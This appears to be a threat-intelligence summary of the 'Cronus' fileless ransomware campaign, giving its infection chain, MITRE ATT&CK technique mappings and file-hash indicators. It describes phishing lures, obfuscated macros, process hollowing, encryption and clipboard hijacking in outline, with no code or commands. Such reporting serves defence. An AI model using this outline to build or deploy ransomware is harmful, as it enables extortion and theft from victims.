Cronus is a fileless ransomware campaign that uses fake PayPal receipts to lure victims and runs in memory via PowerShell, without writing malicious content to disk. It employs a multi-stage infection chain (malicious Word document → PowerShell loader → in-memory .NET payload) with obfuscation, and includes ransomware behavior, persistence, and data manipulation. #Cronus #PowerShell #NETWALKER #paypal
Keypoints
- Discovery Date: 14th July 2024
- Malicious Document: A fake receipt document named paypal_charges.doc used to initiate the attack.
- Infection Method: Primarily spread through phishing vectors (spear phishing via a Word attachment).
- Obfuscation Techniques: Embedded VBA macros and PowerShell scripts are heavily obfuscated to evade detection.
- Ransomware Behavior: Encrypts various file types and manipulates clipboard data to replace Bitcoin addresses.
- Persistence Mechanism: Registry run keys are used to maintain startup execution.
- Encryption Methods: Two AES-based methods are employed depending on file size (FULL_ENCRYPT for small files, TRIPLE_ENCRYPT for larger ones).
MITRE Techniques
- [T1566.001] Phishing – Spear phishing Attachment – Used a malicious Word document to initiate the attack. ‘Used a malicious Word document to initiate the attack.’
- [T1204.002] User Execution: Malicious File – Victims execute the malicious document, triggering the infection. ‘Victims execute the malicious document, triggering the infection.’
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to execute the second stage of the attack. ‘PowerShell is used to execute the second stage of the attack.’
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Malicious VBA macros are executed from the Word document. ‘Malicious VBA macros are executed from the Word document.’
- [T1547.001] Registry Run Keys / Startup Folder – Creates a registry entry for persistence. ‘Creates a registry entry for persistence.’
- [T1027.010] Command Obfuscation – Obfuscation techniques are used to hide the malicious code. ‘Obfuscation techniques are used to hide the malicious code.’
- [T1620] Reflective Code Loading – Reflective loading is used to execute the ransomware payload. ‘Reflective loading is used to execute the ransomware payload.’
- [T1055.012] Process Hollowing – Injects malicious code into legitimate processes. ‘Injects malicious code into legitimate processes.’
- [T1057] Process Discovery – Enumerates running processes to terminate them. ‘Enumerates running processes to terminate them.’
- [T1486] Data Encrypted for Impact – Encrypts files on the victim’s system. ‘Encrypts files on the victim’s system.’
- [T1491.001] Defacement: Internal Defacement – Changes system settings (e.g., wallpaper) as part of the attack. ‘Changes system settings (e.g., wallpaper) as part of the attack.’
- [T1565.002] Data Manipulation: Transmitted Data Manipulation – Manipulates clipboard data to replace Bitcoin addresses. ‘Manipulates clipboard data to replace Bitcoin addresses.’
Indicators of Compromise
- [Hashes (SHA-256)] – 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3, 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb – associated with paypal_charges.doc
- [File name] – paypal_charges.doc, 8eef4df388f2217caec3dc26.ps1 – used as the initial lure and second-stage loader